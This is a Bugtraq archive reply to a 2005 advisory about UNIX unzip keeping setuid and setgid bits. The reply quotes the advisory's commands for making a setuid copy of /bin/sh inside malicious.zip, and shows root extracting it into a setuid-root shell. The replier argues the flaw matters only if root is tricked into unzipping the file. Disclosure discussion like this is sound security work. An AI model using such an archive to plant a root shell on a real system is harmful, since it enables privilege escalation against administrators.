Bugtraq mailing list archives

Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files

From: John Simpson <jms1 () jms1 net>
Date: Mon, 28 Feb 2005 17:20:10 -0500

On 28 Feb 2005, at 08:17, Albert Puigsech Galicia wrote:

III. Exploit
It's realy easy to test this vulnerability. You can create a maliciousZIP
file following this example:

 $ cp /bin/sh .
 $ chmod 4777 sh
 $ zip malicious.zip sh
When another user (including root) unpacks the file, a setuid shellfile will
be created without any warning, as you can see here:

 # id
 # unzip malicious.zip
 Archive:  malicious.zip
  inflating: sh
 # ls -l sh
 -rwsrwxrwx  1 root root 705148 Jan 16 17:04 sh

this only works if the user un-zipping the file is already root.otherwise it creates an "sh" binary which is setuid to the user whounzipped the file. this kind of "exploit" is only useful if you cansomehow trick root into unzipping the file- it cannot be used to gainroot on a machine where you don't already have it.

although i will agree that having the unzip program warn the user whencreating a setuid or setgid file is a good idea in general.


--------------------------------------------------
| John M. Simpson - KG4ZOW - Programmer At Large |
| http://www.jms1.net/           <jms1 () jms1 net> |
--------------------------------------------------
| Mac OS X proves that it's easier to make UNIX  |
| pretty than it is to make Windows secure.      |
--------------------------------------------------

Attachment: PGP.sig
Description: This is a digitally signed message part

Current thread:

7a69Adv#22 - UNIX unzip keep setuid and setgid files Albert Puigsech Galicia (Feb 28)
- Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files John Simpson (Feb 28)
  - Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files Han Boetes (Mar 01)
    - Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files devnull (Mar 01)
    - Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files exon (Mar 01)